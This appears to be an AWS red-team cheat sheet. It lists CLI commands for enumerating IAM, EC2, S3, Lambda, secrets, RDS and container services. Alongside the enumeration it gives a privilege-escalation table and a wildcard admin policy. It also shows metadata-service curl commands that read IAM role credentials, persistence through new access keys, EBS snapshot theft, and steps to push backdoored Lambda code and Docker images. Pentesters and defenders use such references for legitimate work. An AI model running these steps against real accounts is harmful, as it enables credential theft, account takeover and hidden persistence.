# STS

Configure profile:

`aws configure --profile carts-user1`

List Token:

`aws sts get-caller-identity`

List Token of specified profile:

`aws sts get-caller-identity --profile demo`

# Users

List of IAM Users :

`aws iam list-users`

List the IAM groups that the specified IAM user belongs to :

`aws iam list-groups-for-user --user-name admin`

List all manages policies that are attached to the specified IAM user :

`aws iam list-attached-user-policies --user-name admin`

Lists the names of the inline policies embedded in the specified IAM user :

`aws iam list-user-policies --user-name admin`

# Group

List of IAM Groups:

`aws iam list-groups`

Lists all managed policies that are attached to the specified IAM Group :

`aws iam list-attached-group-policies --group-name [group name]`

List the names of the inline policies embedded in the specified IAM Group:

`aws iam list-group-policies --group-name [group name]`

# Roles

List of IAM Roles :

`aws iam list-roles`

Lists all managed policies that are attached to the specified IAM role :

`aws iam list-attached-role-policies --role-name [role name]`

List the names of the inline policies embedded in the specified IAM role :

`aws iam list-role-policies --role-name [role name]`

# Policies

List of IAM Policies :

`aws iam list-policies`

Retrieves information about the specified managed policy :

`aws iam get-policy --policy-arn [policy arn]`

Lists information about the versions of the specified manages policy :

`aws iam list-policy-versions --policy-arn [policy arn]`

Retrieved information about the specified version of the specified managed policy :

`aws iam get-policy-version --policy-arn policy-arn --version-id [version id]`

Retrieves the specified inline policy document that is embedded on the specified IAM user / group / role :

```
aws iam get-user-policy --user-name [user name] --policy-name [policy name]
aws iam get-group-policy --group-name [group name] --policy-name [policy name]
aws iam get-role-policy --role-name [role name] --policy-name [policy name]
```

Add an inline policy document that is embedded in the specified IAM user :

`aws iam put-user-policy --user-name [Username] --policy-name [PolicyName] --policy-document file://Policy.json`

##### Policy.json
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "*"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}
```

# Privileges Escalation

| Privilege Escalation Methods                               | Required Permission        |
| ---                                                        |---                         |
| Attaching a policy to a user                               | iam:AttachUserPolicy       | 
| Attaching a policy to a group                              | iam:AttachGroupPolicy      |
| Attaching a policy to a role                               | iam:AttachRolePolicy       |
| Creating a new user access key                             | iam:CreateAccessKey        |
| Creating a new login profile                               | iam:CreateLoginProfile     |
| Updating an existing login profile                         | iam:UpdateLoginProfile     |
| Creating an EC2 instance with an existing instance profile | iam:PassRole               | 
|                                                            | ec2:RunInstances           |
| Creating/updating an inline policy for a user              | iam:PutUserPolicy          |
| Creating/updating an inline policy for a group             | iam:PutGroupPolicy         |
| Creating/updating an inline policy for a role              | iam:PutRolePolicy          |
| Adding a user to a group                                   | iam:AddUserToGroup         |
| Updating the AssumeRolePolicyDocument of a role            | iam:UpdateAssumeRolePolicy |
|                                                            | sts:AssumeRole             |
| Passing a role to a new Lambda function, then invoking it  | iam:PassRole               |
|                                                            | lambda:CreateFunction      |
|                                                            | lambda:InvokeFunction      |
| Updating the code of an existing Lambda function           | lambda:UpdateFunctionCode  |

# Persistence

Creates a new AWS secret access key for IAM User :

`aws iam create-access-key --user-name [username]`

Configure AWS CLI for New User :

`aws configure --profile [profile name]`

# VPC

Describe about VPCs :\
`aws ec2 describe-vpcs --region us-east-2`

Describe about Subnets :\
`aws ec2 describe-subnets`

Describe about Route Table :\
`aws ec2 describe-route-tables`

Describe about Network ACLs :\
`aws ec2 describe-network-acls`

Describes all VPC Peering Connections :\
`aws ec2 describe-vpc-peering-connections`

Describe about Subnet of the specified VPC :\
`aws ec2 describe-subnets --filters "Name=vpc-id, Values=[VpcID]"`

Describe about Route Table of the specified Subnet :\
`aws ec2 describe-route-tables --filters "Name=vpc-id, Values=[VpcID]"`

Describe about Network ACL of the specified VPC :\
`aws ec2 describe-network-acls --filters "Name=vpc-id, Values=[VpcID]"`

Describe about EC2 Instances In the specified VPC :\
`aws ec2 describe-instances --filters "Name=vpc-id, Values=[VpcID]"`

Describe about EC2 Instances In the specified Subnet:\
`aws ec2 describe-instances --filters "Name=subnet-id, Values=[SubnetID]"`

# EC2

Describes the Information about all Instances \
`aws ec2 describe-instances`

Describes the Information about Specified Instance \
`aws ec2 describe-instances --instance-ids [instance id]`

Describes the Information about UserData Attribute of the specified Instance \
`aws ec2 describe-instance-attribute --attribute userData --instance-id [instance id]`

Describes the Information about IAM instance profile associations \
`aws ec2 describe-iam-instance-profile-associations`

Describes the Information about the specified security group \
`aws ec2 describe-security-groups --group-ids [GroupID]`

## AWS Metadata

IMDV1\
`curl http://169.254.169.254/latest/metadata/`\
`curl http://169.254.169.254/latest/meta-data/iam/security-credentials/[Role]`

IMDV2
```
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
```

```
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/[RoleName]
```

## AWS Userdata

IMDV1\
`curl http://169.254.169.254/latest/user-data/`

IMDV2
```
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/
```

Lists the instance profiles:\
`aws iam list-instance-profiles`

Attach an instance profile with a role to a EC2 instance: \
`aws ec2 associate-iam-instance-profile --instance-id [InstanceID] --iam-instance-profile Name=[ProfileName]`

# EBS

Describes the Information about EBS volumes \
`aws ec2 describe-volumes`

Describes about all the available EBS snapshots \
`aws ec2 describe-snapshots --owner-ids self`

Creates a snapshot of the specified volume \
`aws ec2 create-snapshot --volume-id [VolumeID] --description "RedTeam Snapshot"`

Create a volume from snapshots \
`aws ec2 create-volume --snapshot-id [SnapshotID] ---availability-zone [AvailabilityZone]`

Attach specified volume to the ec2-instance \
`aws ec2 attach-volume --volume-id [VolumeID] ---instance-id [InstanceID] --device /dev/xvdb`

Mount Volume on EC2 file system \
`sudo mount /dev/xvdb1 [new-dir]`

# LAMBDA

List of all the lambda functions \
`aws lambda list-functions`

Retrieves the Information about the specified lambda function \
`aws lambda get-function --function-name [function name]`

Retrieves the policy Information about the specified lambda function \
`aws lambda get-policy --function-name [function name]`

Retrieves the event source mapping Information about the specified lambda function \
`aws lambda list-event-source-mappings --function-name [function name]`

List of all the layers (dependencies) in aws account \
`aws lambda list-layers`

Retrieves the full Information about the specified layer name \
`aws lambda get-layer-version --layer-name [LayerName] --version-number [VersionNumber]`

List of all the Rest APIs \
`aws apigateway get-rest-apis`

Get the information about specified API \
`aws apigateway get-rest-api --rest-api-id [ApiId]`

Lists information about a collection of resources \
`aws apigateway get-resources --rest-api-id [ApiId]`

Get information about the specified resource \
`aws apigateway get-resource --rest-api-id [ApiId] --resource-id [ResourceID]`

Get the method information for the specified resource \
`aws apigateway get-method-rest --api-id [ApiID] --resource-id [ResourceID] --http-method [Method]`

List of all stages for a REST API \
`aws apigateway get-stages --rest-api-id [ApiId]`

Get the information about specified API's stage \
`aws apigateway get-stage --rest-api-id [ApiId] --stage-name [StageName]`

List of all the API keys \
`aws apigateway get-api-keys --include-values`

Get the information about a specified API key \
`aws apigateway get-api-key --api-key [ApiKey]`

Upload the backdoor updated code to aws lambda function \
`aws lambda update-function-code --function-name [my-function] --zip-file fileb://[my-function.zip]`

Invoke the update lambda function using API Gateway \
`curl https://uj3lq1cu8e.execute-api.us-east-2.amazonaws.com/default/RedTeamFun1`

Create a lambda function and attach role to this function \
`aws lambda create-function --function-name [my-function] --runtime [python3.7] --zip-file fileb://[my-function.zip] --handler [my-function.handler] --role [RoleArn] --region [Region]`

Invoke the lambda function \
`aws lambda invoke-function --name [FunctionName] response.json --region [Region]`

Lists all managed policies that are attached to the specified IAM user \
`aws iam list-attached-user-policies --user-name [username]`

# S3

List of all the buckets in the aws account \
`aws s3api list-buckets`

Get the information about specified bucket acls \
`aws s3api get-bucket-acl --bucket [bucket name]`

Get the information about specified bucket policy \
`aws s3api get-bucket-policy --bucket [bucket name]`

Retrieves the Public Access Block configuration for an Amazon S3 bucket \
`aws s3api get-public-access-block --bucket [bucket name]`

List of all the objects in specified bucket \
`aws s3api list-objects --bucket [bucket name]`

Get the acls information about specified object \
`aws s3api get-object-acl --bucket [bucket name] --key [object name]`

### Public Access:

Retrieves the Public Access Block configuration for an Amazon S3 bucket \
`https://awsredteam.s3.us-east-2.amazonaws.com/aws.txt`

### Authenticated User:

Retrieves the content of the specified object from s3 bucket \
`aws s3api get-object --bucket [bucket name] --key [object name] [download file location]`

### Time Based URL:

Generate presigned URL for an object in the s3 bucket \
`aws s3 presign s3://[Bucket-Name]/[ObjectName] --expires-in 604800`

# Secret Manager

Lists of the all secrets that are stored by Secrets Manager \
`aws secretsmanager list-secrets`

Describes about specified secret \
`aws secretsmanager describe-secret --secret-id [Name]`

Get the resource based policy that is attached to the specified Secret \
`aws secretsmanager get-resource-policy --secret-id [Name]`

Retrieve the specified values
`aws secretsmanager get-secret-value --secret-id [Name]`

Lists of the all keys available in key management server (KMS) \
`aws kms list-keys`

Describes about specified key \
`aws kms describe-key --key-id [KeyID]`

Lists of policies attached to specified key \
`aws kms list-key-policies --key-id [KeyID]`

Get full information about a policy \
`aws kms get-key-policy --policy-name [policy-name] --key-id [key-id]`

Decrypt the encrypted secret by kms key \
`aws kms decrypt --ciphertext-blob fileb://ExampleEncryptedFile --output text --query Plaintext`

# RDS

Describes the Information about the clusters in RDS \
`aws rds describe-db-clusters`

Describes the Information about the database instances in RDS \
`aws rds describe-db-instances`

Describes the Information about the subnet groups in RDS \
`aws rds describe-db-subnet-groups`

Describes the Information about the database security groups in RDS \
`aws rds describe-db-security-groups`

Describes the Information about the database proxies in RDS \
`aws rds describe-db-proxies`

Get the database instance connection temporary token from the RDS Endpoint \
`aws rds generate-db-auth-token --hostname [HostName] --port [PORT] --username [UserName] --region [Region]`

Connect to the RDS mysql instance using temporary token \
`mysql -h [HostName] -u [UserName] -P [PORT] --enable-cleartext-plugin --password=$TOKEN`

# Containers

Describe about all the repositories in the container registry \
`aws ecr describe-repositories`

Get the information about repository policy \
`aws ecr get-repository-policy --repository-name [RepositoryName]`

Lists of all images in the specified repository \
`aws ecr list-images --repository-name [RepositoryName]`

Describe the information about a container image \
`aws ecr describe-images --repository-name [RepositoryName] --image-ids imageTag=[ImageTag]`

Lists all ECS Clusters \
`aws ecs list-clusters`

Describe information about specified cluster \
`aws ecs describe-clusters --cluster [ClusterName]`

Lists all services in the specified cluster \
`aws ecs list-services --cluster [ClusterName]`

Describe the information about a specified service \
`aws ecs describe-services --cluster [ClusterName] --services [ServiceName]`

Lists all tasks in the specified cluster \
`aws ecs list-tasks --cluster [ClusterName]`

Describe the information about a specified task \
`aws ecs describe-tasks --cluster [ClusterName] --tasks [TaskArn]`

Lists all containers in the specified cluster \
`aws ecs list-container-instances --cluster [Cluster Name]`

Lists all EKS Clusters \
`aws eks list-clusters`

Describe the information about a specified cluster \
`aws eks describe-cluster --name [Cluster Name]`

List of all node groups in a specified cluster \
`aws eks list-nodegroups --cluster-name [Cluster Name]`

Describe the information about a specific node group in a cluster \
`aws eks describe-nodegroup --cluster-name [Cluster Name] --nodegroup-name [Node Group]`

List of all fargate in a specified cluster \
`aws eks list-fargate-profiles --cluster-name [Cluster Name]`

Describe the information about a specific fargate profile in a cluster \
`aws eks describe-fargate-profile --cluster-name [Cluster Name] --fargate-profile-name [Profile Name]`

Authenticate docker daemon to ECR \
`aws ecr get-login-password --region [region] | docker login --username AWS --password-stdin [ECR-Addr]`

Build backdoored docker image \
`docker build -t [Image Name] .`

Tag the docker image \
`docker tag [Image Name] [ECR-Addr:Image-Name]`

Push the docker image to Aws Container Registry \
`docker push [ECR-Addr:Image-Name]`